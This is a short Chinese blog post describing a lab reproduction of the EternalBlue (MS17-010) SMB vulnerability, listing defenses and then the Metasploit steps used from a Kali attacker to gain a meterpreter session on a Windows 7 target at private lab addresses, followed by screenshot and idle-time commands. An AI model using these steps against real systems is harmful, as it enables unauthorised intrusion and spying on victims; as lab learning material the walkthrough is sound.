永恒之蓝漏洞复现(MS17-010)

MS17-010(永恒之蓝) 2017年爆发的漏洞  存在于windows系统,通过SMB(使用TCP139端口和TCP445端口)协议入侵

流量特征:电脑卡顿,耗电提高;大量TCP数据请求,且数据包较大

防御方法:打开防火墙,安装杀毒软件;禁用139、445端口;禁用SMB协议

在win7(靶机)的命令提示符中输入ipconfig,得知靶机ip为192.168.0.111

在kali(攻击机)终端中输入ifconfig,得知攻击机ip为192.168.0.110

Kali中输入ping 靶机IP,如上图所显,即攻击机可与靶机连接

在kali中使用nmap功能,发现靶机中的139、445端口均为开放状态

输入msfconsole,成功启动

输入search ms17-010,0号即为永恒之蓝

使用永恒之蓝

输入show options,可知LHOST(攻击机)为192.168.0.110(kali)

设置RHOST(靶机)为192.168.0.111(win7)

输入show targets

将靶子调整为1(靶机win7)

输入run运行,尾部出现meterpreter说明成功

此时已获得靶机权限,可使用screenshot截屏

输入idletime,可知靶机空闲时间为21分钟12秒

  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值